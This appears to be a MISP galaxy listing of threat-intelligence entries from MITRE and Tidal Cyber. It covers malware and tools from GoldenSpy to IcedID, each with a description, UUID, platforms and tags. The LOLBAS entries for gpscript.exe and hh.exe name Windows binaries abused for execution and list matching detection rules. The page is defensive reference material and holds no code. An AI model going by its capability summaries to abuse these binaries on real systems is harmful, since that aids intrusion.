software_attack_id | S0249 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GoldenSpy
GoldenSpy is a backdoor malware which has been packaged with legitimate tax preparation software. GoldenSpy was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.[Trustwave GoldenSpy June 2020]
Internal MISP references
UUID 1b135393-c799-4698-a880-c6a86782adee
which can be used as a unique global reference for GoldenSpy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0493 |
source | MITRE |
tags | ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55'] |
type | ['malware'] |
GoldFinder
GoldFinder is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. GoldFinder was discovered in early 2021 during an investigation into the SolarWinds Compromise by APT29.[MSTIC NOBELIUM Mar 2021]
Internal MISP references
UUID 4e8c58c5-443e-4f73-91e9-89146f04e307
which can be used as a unique global reference for GoldFinder
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0597 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GoldMax
GoldMax is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. GoldMax was discovered in early 2021 during the investigation into the SolarWinds Compromise, and has likely been used by APT29 since at least mid-2019. GoldMax uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.[MSTIC NOBELIUM Mar 2021][FireEye SUNSHUTTLE Mar 2021][CrowdStrike StellarParticle January 2022]
Internal MISP references
UUID b05a9763-4288-4656-bf4e-ba02bb8b35d6
which can be used as a unique global reference for GoldMax
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0588 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Goopy
Goopy is a Windows backdoor and Trojan used by APT32 that shares several similarities with another backdoor used by the group (Denis). Goopy is named for its impersonation of the legitimate Google Updater executable.[Cybereason Cobalt Kitty 2017]
Internal MISP references
UUID a75855fd-2b6b-43d8-99a5-2be03b544f34
which can be used as unique global reference for Goopy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0477 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GooseEgg
GooseEgg is a custom tool developed by Russian espionage group Forest Blizzard that is designed for privilege escalation and credential access purposes. GooseEgg exploits CVE-2022-38028, a vulnerability in the Windows Print Spooler service. Researchers describe the tool as a "simple" launcher application, but a range of subsequent post-exploitation actions are possible, including remote code execution, backdoor deployment, and lateral movement within the compromised network.[Microsoft Security Blog 4 22 2024]
Internal MISP references
UUID f9c32a11-964c-4480-968b-e520b8c7b26e
which can be used as unique global reference for GooseEgg
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5318 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', '7de7d799-f836-4555-97a4-0db776eb6932', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Gootloader
Gootloader is a highly active banking Trojan-turned-loader malware that has attacked organizations in a wide range of verticals and countries. Gootloader, also referred to by its related payload, Gootkit, first emerged in 2014 but has been especially active since 2020. In the past two years alone, verticals including finance, healthcare, defense, pharmaceutical, energy, and automotive have faced Gootloader campaigns, with victims across North America, Western Europe, and South Korea, and the malware is regularly used to deliver high-impact payloads, including Cobalt Strike, IcedID (a common ransomware precursor), and more. Cybereason indicates the financial and healthcare sectors are especially impacted.[Cybereason Gootloader February 2023] Red Canary and The DFIR Report provide tool-agnostic suggested detection logic for key behaviors observed during recent Gootloader campaigns.[Red Canary Gootloader April 2023][DFIR Report Gootloader]
Internal MISP references
UUID 3eec857e-dce3-4865-a65f-3ad5a559a3e6
which can be used as unique global reference for Gootloader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5289 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Gpscript
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by group policy to process scripts
Author: Oddvar Moe
Paths:
* C:\Windows\System32\gpscript.exe
* C:\Windows\SysWOW64\gpscript.exe
Resources:
* https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Detection:
* Sigma: proc_creation_win_lolbin_gpscript.yml
* IOC: Scripts added in local group policy
* IOC: Execution of Gpscript.exe after logon[Gpscript.exe - LOLBAS Project]
Internal MISP references
UUID acf4a502-2730-4b36-aea3-652420390977
which can be used as unique global reference for Gpscript
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5113 |
source | Tidal Cyber |
tags | ['2ca5c5e4-ee7f-4698-84ec-ce04d2c1e9cc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Grandoreiro
Grandoreiro is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. Grandoreiro has confirmed victims in Brazil, Mexico, Portugal, and Spain.[Securelist Brazilian Banking Malware July 2020][ESET Grandoreiro April 2020]
Internal MISP references
UUID 61d277f2-abdc-4f2b-b50a-10d0fe91e588
which can be used as unique global reference for Grandoreiro
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0531 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
GraphicalProton
According to joint Cybersecurity Advisory AA23-347A (December 2023), GraphicalProton "is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs" to exchange data with its operators. During a 2023 campaign, authorities also observed an HTTPS variant of GraphicalProton that relies on HTTP requests instead of cloud-based services.[U.S. CISA SVR TeamCity Exploits December 2023]
Internal MISP references
UUID f77398ad-e043-4694-ade0-d6ea16a994e7
which can be used as unique global reference for GraphicalProton
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5077 |
source | Tidal Cyber |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GravityRAT
GravityRAT is a remote access tool (RAT) that has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames linked to the author have been recovered: "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organizations and entities in India. [Talos GravityRAT]
Internal MISP references
UUID 08cb425d-7b7a-41dc-a897-9057ce57fea9
which can be used as unique global reference for GravityRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0237 |
source | MITRE |
type | ['malware'] |
Green Lambert
Green Lambert is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of Green Lambert may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.[Kaspersky Lamberts Toolkit April 2017][Objective See Green Lambert for OSX Oct 2021]
Internal MISP references
UUID f5691425-6690-4e5e-8304-3ede9d2f5a90
which can be used as unique global reference for Green Lambert
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'macOS', 'Windows', 'iOS'] |
software_attack_id | S0690 |
source | MITRE |
type | ['malware'] |
GreyEnergy
GreyEnergy is a backdoor written in C and compiled in Visual Studio. GreyEnergy shares similarities with the BlackEnergy malware and is thought to be its successor.[ESET GreyEnergy Oct 2018]
Internal MISP references
UUID f646e7f9-4d09-46f6-9831-54668fa20483
which can be used as unique global reference for GreyEnergy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0342 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GRIFFON
GRIFFON is a JavaScript backdoor used by FIN7. [SecureList Griffon May 2019]
Internal MISP references
UUID ad358082-d83a-4c22-81a1-6c34dd67af26
which can be used as unique global reference for GRIFFON
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0417 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
GrimAgent
GrimAgent is a backdoor that has been used before the deployment of Ryuk ransomware since at least 2020; it is likely used by FIN6 and Wizard Spider.[Group IB GrimAgent July 2021]
Internal MISP references
UUID c40a71d4-8592-4f82-8af5-18f763e52caf
which can be used as unique global reference for GrimAgent
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0632 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Grixba
Grixba is a tool used by Play Ransomware operators to scan victim networks for information discovery purposes. Grixba compiles and saves collected information into CSV files, which are then compressed with WinRAR and exfiltrated to threat actors.[Symantec Play Ransomware April 19 2023]
Internal MISP references
UUID 3ff9e020-8a7a-4c6f-a607-117ce9e436c5
which can be used as unique global reference for Grixba
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5079 |
source | Tidal Cyber |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
gsecdump
gsecdump is a publicly available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. [TrueSec Gsecdump]
Internal MISP references
UUID 5ffe662f-9da1-4b6f-ad3a-f296383e828c
which can be used as unique global reference for gsecdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0008 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
GuLoader
GuLoader is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including NETWIRE, Agent Tesla, NanoCore, FormBook, and Parallax RAT.[Unit 42 NETWIRE April 2020][Medium Eli Salem GuLoader April 2021]
Internal MISP references
UUID 03e985d6-870b-4533-af13-08b1e0511444
which can be used as unique global reference for GuLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0561 |
source | MITRE |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
H1N1
H1N1 is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. [Cisco H1N1 Part 1]
Internal MISP references
UUID 5f1602fe-a4ce-4932-9cf9-ec842f2c58f1
which can be used as unique global reference for H1N1
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0132 |
source | MITRE |
type | ['malware'] |
Hacking Team UEFI Rootkit
Hacking Team UEFI Rootkit is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. [TrendMicro Hacking Team UEFI]
Internal MISP references
UUID 75db2ac3-901e-4b1f-9a0d-bac6562d57a3
which can be used as unique global reference for Hacking Team UEFI Rootkit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0047 |
source | MITRE |
type | ['malware'] |
HALFBAKED
HALFBAKED is a malware family consisting of multiple components intended to establish persistence in victim networks. [FireEye FIN7 April 2017]
Internal MISP references
UUID 5edf0ef7-a960-4500-8a89-8c8b4fdf8824
which can be used as unique global reference for HALFBAKED
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0151 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HAMMERTOSS
HAMMERTOSS is a backdoor that was used by APT29 in 2015. [FireEye APT29] [F-Secure The Dukes]
Internal MISP references
UUID cc07f03f-9919-4856-9b30-f4d88940b0ec
which can be used as unique global reference for HAMMERTOSS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0037 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hancitor
Hancitor is a downloader that has been used by Pony and other information stealing malware.[Threatpost Hancitor][FireEye Hancitor]
Internal MISP references
UUID 4eee3272-07fa-48ee-a7b9-9dfee3e4550a
which can be used as unique global reference for Hancitor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0499 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
HAPPYWORK
HAPPYWORK is a downloader used by APT37 to target South Korean government and financial victims in November 2016. [FireEye APT37 Feb 2018]
Internal MISP references
UUID c2c31b2e-5da6-4feb-80e3-14ea6d0ea7e8
which can be used as unique global reference for HAPPYWORK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0214 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HARDRAIN
HARDRAIN is a Trojan malware variant reportedly used by the North Korean government. [US-CERT HARDRAIN March 2018]
Internal MISP references
UUID ad0ae3b7-88aa-48b3-86ca-6a5d8b5309a7
which can be used as unique global reference for HARDRAIN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0246 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Havij
Havij is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. [Check Point Havij Analysis]
Internal MISP references
UUID 8bd36306-bd4b-4a76-8842-44acb0cedbcc
which can be used as unique global reference for Havij
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0224 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
HAWKBALL
HAWKBALL is a backdoor that was observed in targeting of the government sector in Central Asia.[FireEye HAWKBALL Jun 2019]
Internal MISP references
UUID 392c5a32-53b5-4ce8-a946-226cb533cc4e
which can be used as unique global reference for HAWKBALL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0391 |
source | MITRE |
type | ['malware'] |
hcdLoader
hcdLoader is a remote access tool (RAT) that has been used by APT18. [Dell Lateral Movement]
Internal MISP references
UUID a7ffe1bd-45ca-4ca4-94da-3b6c583a868d
which can be used as unique global reference for hcdLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0071 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HDoor
HDoor is malware that has been customized and used by the Naikon group. [Baumgartner Naikon 2015]
Internal MISP references
UUID f155b6f9-258d-4446-8867-fe5ee26d8c72
which can be used as unique global reference for HDoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0061 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HELLOKITTY
HELLOKITTY is ransomware written in C++ that shares similar code structure and functionality with DEATHRANSOM and FIVEHANDS. HELLOKITTY has been used since at least 2020; targets have included a Polish video game developer and a Brazilian electric power company.[FireEye FiveHands April 2021]
Internal MISP references
UUID 813a4ca1-84fe-42dc-89de-5873d028f98d
which can be used as unique global reference for HELLOKITTY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0617 |
source | MITRE |
tags | ['4ac8dcde-2665-4066-9ad9-b5572d5f0d28', '3535caad-a155-4996-b986-70bc3cd5ce1e', 'f1ad9eba-f4fd-4aec-92c0-833ac14d741b', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Helminth
Helminth is a backdoor that has at least two variants: one written in VBScript and PowerShell that is delivered via macros in Excel spreadsheets, and one that is a standalone Windows executable. [Palo Alto OilRig May 2016]
Internal MISP references
UUID d6560c81-1e7e-4d01-9814-4be4fb43e655
which can be used as unique global reference for Helminth
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0170 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HermeticWiper
HermeticWiper is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.[SentinelOne Hermetic Wiper February 2022][Symantec Ukraine Wipers February 2022][Crowdstrike DriveSlayer February 2022][ESET Hermetic Wiper February 2022][Qualys Hermetic Wiper March 2022]
Internal MISP references
UUID f0456f14-4913-4861-b4ad-5e7f3960040e
which can be used as unique global reference for HermeticWiper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0697 |
source | MITRE |
tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
HermeticWizard
HermeticWizard is a worm that has been used to spread HermeticWiper in attacks against organizations in Ukraine since at least 2022.[ESET Hermetic Wizard March 2022]
Internal MISP references
UUID 36ddc8cd-8f80-489e-a702-c682936b5393
which can be used as unique global reference for HermeticWizard
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0698 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Heyoka Backdoor
Heyoka Backdoor is a custom backdoor, based on the Heyoka open source exfiltration tool, that has been used by Aoqin Dragon since at least 2013.[SentinelOne Aoqin Dragon June 2022][Sourceforge Heyoka 2022]
Internal MISP references
UUID 1841a6e8-6c23-46a1-9c81-783746083764
which can be used as unique global reference for Heyoka Backdoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1027 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hh
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used for processing chm files in Windows
Author: Oddvar Moe
Paths:
* C:\Windows\hh.exe
* C:\Windows\SysWOW64\hh.exe
Resources:
* https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
Detection:
* Sigma: proc_creation_win_hh_chm_execution.yml
* Sigma: proc_creation_win_hh_html_help_susp_child_process.yml
* Elastic: execution_via_compiled_html_file.toml
* Elastic: execution_html_help_executable_program_connecting_to_the_internet.toml
* Splunk: detect_html_help_spawn_child_process.yml
* Splunk: detect_html_help_url_in_command_line.yml[Hh.exe - LOLBAS Project]
Internal MISP references
UUID 5a0d0b83-5a10-425c-98f7-6cb8eb76fda4
which can be used as unique global reference for Hh
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5114 |
source | Tidal Cyber |
tags | ['7d028d1e-7a95-47f0-9367-55517f9ef170', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
HiddenWasp
HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.[Intezer HiddenWasp Map 2019]
Internal MISP references
UUID ec02fb9c-bf9f-404d-bc54-819f2b3fb040
which can be used as unique global reference for HiddenWasp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0394 |
source | MITRE |
type | ['malware'] |
HIDEDRV
HIDEDRV is a rootkit used by APT28. It has been deployed along with Downdelph to execute and hide that malware. [ESET Sednit Part 3] [Sekoia HideDRV Oct 2016]
Internal MISP references
UUID ce1af464-0b14-4fe9-8591-a6fe58aa96c7
which can be used as unique global reference for HIDEDRV
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0135 |
source | MITRE |
tags | ['1efd43ee-5752-49f2-99fe-e3441f126b00'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hikit
Hikit is malware that has been used by Axiom for late-stage persistence and exfiltration after the initial compromise.[Novetta-Axiom][FireEye Hikit Rootkit]
Internal MISP references
UUID 8046c80c-4339-4cfb-8bfd-464801db2bfe
which can be used as unique global reference for Hikit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0009 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hildegard
Hildegard is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind Hildegard. [Unit 42 Hildegard Malware]
Internal MISP references
UUID 7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c
which can be used as unique global reference for Hildegard
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Containers', 'Linux', 'IaaS'] |
software_attack_id | S0601 |
source | MITRE |
tags | ['4fa6f8e1-b0d5-4169-8038-33e355c08bde', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hi-Zor
Hi-Zor is a remote access tool (RAT) that has characteristics similar to Sakula. It was used in a campaign named INOCNATION. [Fidelis Hi-Zor]
Internal MISP references
UUID 286184d9-f28a-4d5a-a9dd-2216b3c47809
which can be used as unique global reference for Hi-Zor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0087 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
HOMEFRY
HOMEFRY is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other Leviathan backdoors. [FireEye Periscope March 2018]
Internal MISP references
UUID 16db13f2-f350-4323-96cb-c5f4ac36c3e0
which can be used as unique global reference for HOMEFRY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0232 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HOPLIGHT
HOPLIGHT is a backdoor Trojan that has reportedly been used by the North Korean government.[US-CERT HOPLIGHT Apr 2019]
Internal MISP references
UUID 4d94594c-2224-46ca-8bc3-28b12ed139f9
which can be used as unique global reference for HOPLIGHT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0376 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HotCroissant
HotCroissant is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.[US-CERT HOTCROISSANT February 2020] HotCroissant shares numerous code similarities with Rifdoor.[Carbon Black HotCroissant April 2020]
Internal MISP references
UUID a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe
which can be used as unique global reference for HotCroissant
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0431 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HTRAN
HTRAN is a tool that proxies connections through intermediate hops and helps its users disguise their true geographic location. Adversaries can use it to hide their location when interacting with victim networks. [Operation Quantum Entanglement][NCSC Joint Report Public Tools]
Internal MISP references
UUID b98d9fe7-9aa3-409a-bf5c-eadb01bac948
which can be used as unique global reference for HTRAN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0040 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
HTTPBrowser
HTTPBrowser is malware that has been used by several threat groups. [ThreatStream Evasion Analysis] [Dell TG-3390] It is believed to be of Chinese origin. [ThreatConnect Anthem]
Internal MISP references
UUID c4fe23f7-f18c-40f6-b431-0b104b497eaa
which can be used as unique global reference for HTTPBrowser
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0070 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
httpclient
httpclient is malware used by Putter Panda. It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. [CrowdStrike Putter Panda]
Internal MISP references
UUID bf19eba4-7ea1-4c24-95c6-6bcfb44f4c49
which can be used as unique global reference for httpclient
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0068 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HUI Loader
HUI Loader is a custom DLL loader that has been used since at least 2015 by China-based threat groups including Cinnamon Tempest and menuPass to deploy malware on compromised hosts. HUI Loader has been observed in campaigns loading SodaMaster, PlugX, Cobalt Strike, Komplex, and several strains of ransomware.[SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022]
Internal MISP references
UUID 2df88e4e-5a89-5535-ae1a-4c68b19d9078
which can be used as unique global reference for HUI Loader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1097 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hydraq
Hydraq is a data-theft trojan first used by Elderwood in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including APT17.[MicroFocus 9002 Aug 2016][Symantec Elderwood Sept 2012][Symantec Trojan.Hydraq Jan 2010][ASERT Seven Pointed Dagger Aug 2015][FireEye DeputyDog 9002 November 2013][ProofPoint GoT 9002 Aug 2017][FireEye Sunshop Campaign May 2013][PaloAlto 3102 Sept 2015]
Internal MISP references
UUID 4ffbca79-358a-4ba5-bfbb-dc1694c45646
which can be used as unique global reference for Hydraq
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0203 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HyperBro
HyperBro is a custom in-memory backdoor used by Threat Group-3390.[Unit42 Emissary Panda May 2019][Securelist LuckyMouse June 2018][Hacker News LuckyMouse June 2018]
Internal MISP references
UUID 57cec527-26fb-44a1-b1a9-506a3af2c9f2
which can be used as unique global reference for HyperBro
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0398 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
HyperStack
HyperStack is an RPC-based backdoor used by Turla since at least 2018. HyperStack has similarities to other backdoors used by Turla, including Carbon.[Accenture HyperStack October 2020]
Internal MISP references
UUID ba3236e9-c86b-4b5d-89ed-7f71940a0588
which can be used as unique global reference for HyperStack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0537 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
IceApple
IceApple is a modular Internet Information Services (IIS) post-exploitation framework that has been used since at least 2021 against the technology, academic, and government sectors.[CrowdStrike IceApple May 2022]
Internal MISP references
UUID 5a73defd-6a1a-4132-8427-cec649e8267a
which can be used as unique global reference for IceApple
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1022 |
source | MITRE |
type | ['malware'] |
IcedID
IcedID is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. IcedID has been downloaded by Emotet in multiple campaigns.[IBM IcedID November 2017][Juniper IcedID June 2020]
Internal MISP references
